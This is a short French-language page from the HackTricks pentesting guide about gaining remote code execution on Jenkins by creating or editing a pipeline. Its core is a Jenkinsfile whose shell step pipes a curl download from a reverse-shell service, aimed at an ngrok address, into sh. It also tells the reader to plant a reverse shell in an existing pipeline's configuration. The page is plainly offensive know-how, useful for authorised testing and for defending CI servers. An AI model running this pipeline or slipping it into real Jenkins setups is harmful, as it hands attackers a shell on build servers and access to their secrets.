Jenkins RCE Création/Modification de Pipeline

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Création d’un nouveau Pipeline

Dans “Nouvel élément” (accessible à /view/all/newJob), sélectionnez Pipeline :

Dans la section Pipeline, écrivez le reverse shell :

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Enfin, cliquez sur Save, puis sur Build Now et le pipeline sera exécuté :

Modifier un Pipeline

Si vous pouvez accéder au fichier de configuration d’un pipeline configuré, vous pouvez simplement le modifier en ajoutant votre reverse shell puis l’exécuter ou attendre qu’il soit exécuté.

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks